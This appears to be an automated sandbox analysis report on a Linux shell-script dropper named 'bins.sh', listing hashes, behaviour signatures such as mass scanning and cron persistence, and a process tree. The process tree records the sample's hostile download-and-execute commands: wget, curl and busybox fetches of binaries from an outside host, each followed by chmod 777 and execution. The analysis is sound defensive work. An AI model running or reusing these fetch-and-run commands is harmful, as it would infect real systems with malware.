Analysis
- max time kernel: 150s
- max time network: 153s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 04-11-2024 10:45
Static task
- static1
Behavioral tasks
- behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample bins.sh, resource debian9-armhf-20240729-en
- behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample bins.sh, resource debian9-mipsel-20240611-en
General
- Target: bins.sh
- Size: 10KB
- MD5: facd8d5b4de07f8d4d3e00bf507864de
- SHA1: 6b61bfefc5c5b94bbb154d7bfa00d46c67c421a5
- SHA256: 00f8a20ed14d818a6397e452410bbc7ad21628aa1aad3b52031fab9dfcd648ad
- SHA512: 9c32e3e7c4e80b00a5a7cf8ab8d5d4539c19359d0bc62d259b149551d6ef3051a352dde1a701dca898959b6f6d5c1434583f2f992a01caf02fece8a36d5bd721
- SSDEEP: 192:yjojaqBgs6UM43mu0Ay85dgTjF7S7i7DU7wvKhdKHH+5dgTj57S7i7DU7wmhdKHw:yjojaqBgsuAy85dgTjFGuUqC5dgTj5GL
Malware Config
Signatures
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Contacts a large (1893) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 5 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 717 chmod; 725 chmod; 750 chmod; 867 chmod; 886 chmod
- Executes dropped EXE (4 IoCs)
  Processes (ioc, pid, process):
  /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj, 718, cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
  /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d, 726, 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
  /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM, 752, ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
  /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj, 887, n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
- Renames itself (1 IoCs)
  Processes (pid, process): 753 ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes (description, ioc, process): File opened for modification, /var/spool/cron/crontabs/tmp.vBHty3, crontab
- Enumerates running processes
  Discovers information about currently running processes on the system.
  Processes (description, ioc, process):
  File opened for reading, /proc/<pid>/cmdline, ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM, for pids 11, 933, 1025, 1030, 1024, 1041, 687, 897, 976, 985, 994, 13, 22, 75, 661, 825, 766, 789, 836, 818, 1016, 942, 1039, 23, 78, 662, 800, 866, 847, 928, 986, 922, 930, 684, 778, 883, 908, 21, 819, 842, 943, 1013, 77, 777, 801, 874, 918, 802, 923, 979, 1045, 846, 887, 947, 962, 798, 840, 967, 1043, 643, 813, 843
  File opened for reading, /proc/filesystems, crontab
  File opened for reading, /proc/sys/crypto/fips_enabled, curl
- System Network Configuration Discovery (1 TTPs, 19 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid, process): 875 wget; 899 curl; 718 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj; 854 busybox; 729 wget; 745 busybox; 770 wget; 722 curl; 724 busybox; 879 curl; 894 wget; 709 curl; 772 curl; 720 rm; 721 wget; 730 curl; 882 busybox; 693 wget; 716 busybox
- Writes file to tmp directory (10 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process):
  File opened for modification, /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj, wget
  File opened for modification, /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj, curl
  File opened for modification, /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj, busybox
  File opened for modification, /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM, curl
  File opened for modification, /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj, busybox
  File opened for modification, /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d, wget
  File opened for modification, /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d, curl
  File opened for modification, /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d, busybox
  File opened for modification, /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM, wget
  File opened for modification, /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM, busybox
Processes
Process tree (indentation shows parent/child; each entry gives PID, image path, command line, and matched signatures in brackets):
- PID 685: /tmp/bins.sh, cmdline: /tmp/bins.sh
  - PID 689: /bin/rm, cmdline: /bin/rm bins.sh
  - PID 693: /usr/bin/wget, cmdline: wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 709: /usr/bin/curl, cmdline: curl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 716: /bin/busybox, cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 717: /bin/chmod, cmdline: chmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj [File and Directory Permissions Modification]
  - PID 718: /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj, cmdline: ./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj [Executes dropped EXE; System Network Configuration Discovery]
  - PID 720: /bin/rm, cmdline: rm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj [System Network Configuration Discovery]
  - PID 721: /usr/bin/wget, cmdline: wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 722: /usr/bin/curl, cmdline: curl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 724: /bin/busybox, cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 725: /bin/chmod, cmdline: chmod 777 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d [File and Directory Permissions Modification]
  - PID 726: /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d, cmdline: ./46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d [Executes dropped EXE]
  - PID 728: /bin/rm, cmdline: rm 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
  - PID 729: /usr/bin/wget, cmdline: wget http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 730: /usr/bin/curl, cmdline: curl -O http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 745: /bin/busybox, cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 750: /bin/chmod, cmdline: chmod 777 ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM [File and Directory Permissions Modification]
  - PID 752: /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM, cmdline: ./ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM [Executes dropped EXE; Renames itself; Reads runtime system information]
    - PID 754: /bin/sh, cmdline: sh -c "crontab -l"
      - PID 755: /usr/bin/crontab, cmdline: crontab -l
    - PID 758: /bin/sh, cmdline: sh -c "crontab -"
      - PID 759: /usr/bin/crontab, cmdline: crontab - [Creates/modifies Cron job; Reads runtime system information]
  - PID 766: /bin/rm, cmdline: rm ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
  - PID 770: /usr/bin/wget, cmdline: wget http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk [System Network Configuration Discovery]
  - PID 772: /usr/bin/curl, cmdline: curl -O http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk [System Network Configuration Discovery]
  - PID 854: /bin/busybox, cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk [System Network Configuration Discovery]
  - PID 867: /bin/chmod, cmdline: chmod 777 YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk [File and Directory Permissions Modification]
  - PID 868: /tmp/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk, cmdline: ./YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
  - PID 871: /bin/rm, cmdline: rm YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
  - PID 875: /usr/bin/wget, cmdline: wget http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj [System Network Configuration Discovery]
  - PID 879: /usr/bin/curl, cmdline: curl -O http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj [System Network Configuration Discovery]
  - PID 882: /bin/busybox, cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 886: /bin/chmod, cmdline: chmod 777 n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj [File and Directory Permissions Modification]
  - PID 887: /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj, cmdline: ./n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj [Executes dropped EXE]
  - PID 889: /bin/rm, cmdline: rm n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
  - PID 894: /usr/bin/wget, cmdline: wget http://conn.masjesu.zip/bins/QcdrIEZDXYUM9RbUiOWvmWrbMxHb7Wcj6i [System Network Configuration Discovery]
  - PID 899: /usr/bin/curl, cmdline: curl -O http://conn.masjesu.zip/bins/QcdrIEZDXYUM9RbUiOWvmWrbMxHb7Wcj6i [System Network Configuration Discovery]
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 127KB
  MD5: 89077b7bd4bcafca7713be43635c4862
  SHA1: fc02edb8fba29ea8ee99e6157ef8560334530052
  SHA256: 78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
  SHA512: 1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
- Filesize: 98KB
  MD5: 5141342d0df8699fa32a6b066a0c592e
  SHA1: 8157673225bd5182f16215e2aa823a25ca2d4fbc
  SHA256: 54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
  SHA512: d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
- Filesize: 151KB
  MD5: 6c583043d91c55aa470c08c87058e917
  SHA1: abf65a5b9bba69980278ad09356e53de8bb89439
  SHA256: 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
  SHA512: 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
- Filesize: 111KB
  MD5: ca897a38f23ec23521ce0b1b83f8422d
  SHA1: b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
  SHA256: 043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
  SHA512: 10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
- Filesize: 210B
  MD5: 869e0da355a4faabd8aa2d661459b7e1
  SHA1: 5d817d53c410b8f45d4cce5cdf7b228df7ff97a1
  SHA256: 60a6877783cee1b04d48bc18da841c991b136e2b21b22ca78e768f1fc2abe818
  SHA512: 31f64160224867c7ab6449ad31d78296c300561a545bb5d26d048d047b594e1eee8e52c70744db2fc6d07d0479346e5cd3198c732bf8b1732a5320895a1e6af6